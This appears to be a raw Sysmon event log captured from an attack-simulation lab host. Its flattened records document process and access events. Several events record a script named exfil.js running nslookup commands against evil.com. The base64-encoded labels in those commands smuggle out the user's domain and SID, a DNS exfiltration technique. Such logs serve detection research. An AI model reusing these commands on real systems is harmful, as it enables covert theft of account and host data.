14:21:41.370{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F944-000000005F02}2020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.370{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F944-000000005F02}2020C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.338{2E1864BB-18F5-629A-F944-000000005F02}20207616C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-F844-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F944-000000005F02}2020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F844-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-18E0-629A-6742-000000005F02}39763140C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-F844-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.326{2E1864BB-18F5-629A-F844-000000005F02}5104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrtli.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.322{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgaevy.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.291{2E1864BB-18F5-629A-F644-000000005F02}77727936C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-F744-000000005F02}3236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.291{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.291{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.291{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.291{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.291{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F744-000000005F02}3236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.291{2E1864BB-18F5-629A-F544-000000005F02}43484232C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-F744-000000005F02}3236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.303{2E1864BB-18F5-629A-F744-000000005F02}3236C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-F544-000000005F02}4348C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgaevy.tmp 2>&1 10341000x8000000000000000212203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.287{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F644-000000005F02}7772C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.287{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F644-000000005F02}7772C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-18F5-629A-F644-000000005F02}77727936C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-F544-000000005F02}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F644-000000005F02}7772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000212199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67AA8B4B7856B5C050126623338F98D8,SHA256=2CD4E33F30A3314CF00AD41DD5E0C28A7D076C0CF7E77DB3BBBEBC7937794E1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F544-000000005F02}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.269{2E1864BB-18E0-629A-6742-000000005F02}39767796C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-F544-000000005F02}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.270{2E1864BB-18F5-629A-F544-000000005F02}4348C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgaevy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 